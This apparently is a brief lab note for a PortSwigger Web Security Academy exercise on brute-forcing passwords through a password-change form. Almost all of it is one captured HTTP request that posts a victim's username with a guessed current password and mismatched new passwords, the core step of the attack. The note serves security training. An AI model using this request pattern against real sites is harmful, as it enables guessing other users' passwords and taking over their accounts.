Lab: Password brute-force via password change
https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change
POST /my-account/change-password HTTP/2
Host: 0a6d0050037e8053e213051c00aa0083.web-security-academy.net
Cookie: session=k09iNJHJdYBvDCi570yuWKkUmNXFuODI; session=1xGm5Ot1qF4S4CFmcmk4JvEeMZXzw9xV
Content-Length: 88
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: de-DE,de;q=0.9
Origin: https://0a6d0050037e8053e213051c00aa0083.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a6d0050037e8053e213051c00aa0083.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
username=carlos¤t-password=peter&new-password-1=password1&new-password-2=password2
Last updated